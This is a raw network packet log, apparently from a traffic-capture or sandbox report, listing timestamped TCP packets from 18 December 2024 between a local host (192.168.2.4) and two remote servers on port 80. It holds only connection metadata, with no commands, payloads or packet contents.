                                                                              Dec 18, 2024 21:00:21.284073114 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.284090996 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.284107924 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.284137964 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.286828041 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.286844969 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.286950111 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.289540052 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.289556026 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.289603949 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.292253017 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.292275906 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.292300940 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.294917107 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.294934988 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.294970989 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.297708988 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.297728062 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.297744036 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.297811031 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.297811031 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.300357103 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.300374031 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.300420046 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.303064108 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.303081036 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.303133011 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.305752993 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.305771112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.305816889 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.308451891 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.308470011 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.308485985 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.308537960 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.311134100 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.311151028 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.311181068 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.313932896 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.313950062 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.313987017 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.316529036 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.316545963 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.316585064 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.319109917 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.319133043 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.319181919 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.321799040 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.321819067 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.321834087 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.321865082 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.321892023 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.324418068 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.324434042 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.324474096 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.327097893 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.327130079 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.327536106 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.329771996 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.329790115 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.329860926 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.332278967 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.333653927 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.333671093 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.333686113 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.333722115 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.333755970 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.336296082 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.336313963 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.336360931 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.338932991 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.338949919 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.339046001 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.341542959 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.341559887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.341753960 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.344152927 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.344170094 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.344186068 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.344218016 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.346771955 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.346790075 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.346832037 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.349410057 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.349427938 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.349476099 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.351979971 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.351999998 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.352047920 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.354554892 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.354579926 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.354613066 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.357127905 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.357146025 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.357161999 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.357191086 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.357213020 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.359694958 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.359714031 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.359766006 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.362236977 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.362255096 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.362329960 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.364770889 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.364787102 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.364850044 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.367342949 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.367360115 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.367378950 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.367428064 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.369863033 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.369879961 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.369920969 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.372421026 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.372437954 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.372481108 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.374986887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.375004053 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.375052929 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.377470016 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.377485991 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.377526999 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.379990101 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.380007029 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.380024910 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.380068064 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.380101919 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.382509947 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.382528067 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.382606983 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.385061979 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.385078907 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.385143042 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.387562037 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.387578964 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.387645006 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.390069008 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.391360044 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.391376019 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.391392946 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.391421080 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.391443968 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.393847942 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.393865108 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.393918037 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.396336079 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.396353006 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.396405935 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.398814917 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.398832083 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.398906946 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.401391983 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.401408911 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.401424885 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.401463032 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.403759956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.403776884 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.403805971 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.406253099 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.406270981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.406330109 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.408745050 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.408761978 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.408788919 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.411217928 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.411235094 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.411251068 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.411283016 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.411318064 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.413750887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.413769007 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.413820028 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.416174889 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.416191101 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.416263103 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.418699980 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.418716908 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.418766975 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.421185970 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.421202898 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.421271086 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.423667908 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.423686028 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.423702002 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.423769951 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.426083088 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.426100016 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.426156044 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.428530931 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.428548098 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.428596020 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.431004047 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.431021929 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.431036949 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:21.431078911 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:21.431118965 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:23.347564936 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:26.770786047 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:26.890499115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:26.890630007 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:26.896815062 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:27.016623974 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.391782045 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.392292976 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.392304897 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.392342091 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.393712044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.393724918 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.393764019 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.396270990 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.396284103 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.396442890 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.398332119 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.398341894 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.398535013 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.400845051 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.400991917 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.512388945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.512681007 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.512924910 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.516474962 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.578948975 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.598918915 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.599721909 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.599812984 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.603265047 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.603677034 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.603740931 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.611422062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.611980915 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.612055063 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.619852066 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.620296001 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.620373964 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.628298044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.629215002 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.629390001 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.636668921 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.637073994 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.637396097 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.645488977 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.645507097 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.646811962 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.653431892 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.653965950 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.654134035 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.663281918 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.663482904 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.664412975 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.671370983 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.671610117 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.671726942 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.699908972 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.700016975 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.700257063 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.806436062 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.806827068 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.807164907 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.809070110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.809938908 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.810401917 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.810467005 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.813138008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.813287973 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.813596010 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.818651915 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.818717003 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.818905115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.823787928 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.823935032 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.824290991 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.829015017 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.829077005 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.829571009 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.834332943 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.834441900 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.834983110 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.839696884 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.839780092 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.840050936 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.844993114 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.845195055 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.845422983 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.850712061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.850729942 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.850867987 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.855498075 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.855624914 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.856349945 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.860744953 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.861102104 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.861207008 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.866044044 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.866133928 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.866545916 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.871392012 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.871751070 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.871818066 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.876708031 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.876780987 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.877126932 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.881942987 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.882077932 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.882388115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.998529911 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:28.998823881 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:28.998891115 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.000880957 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.000984907 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.001239061 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.014369011 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.014743090 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.015084028 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.017152071 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.017164946 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.017242908 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.021835089 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.022836924 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.023355961 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.026882887 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.027302980 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.028498888 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.028512955 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.029000998 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.033262014 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.033443928 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.034317970 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.037727118 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.038135052 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.038209915 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.042469025 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.043014050 CET8049744139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:29.043349981 CET4974480192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:29.047379017 CET8049744139.99.188.124192.168.2.4
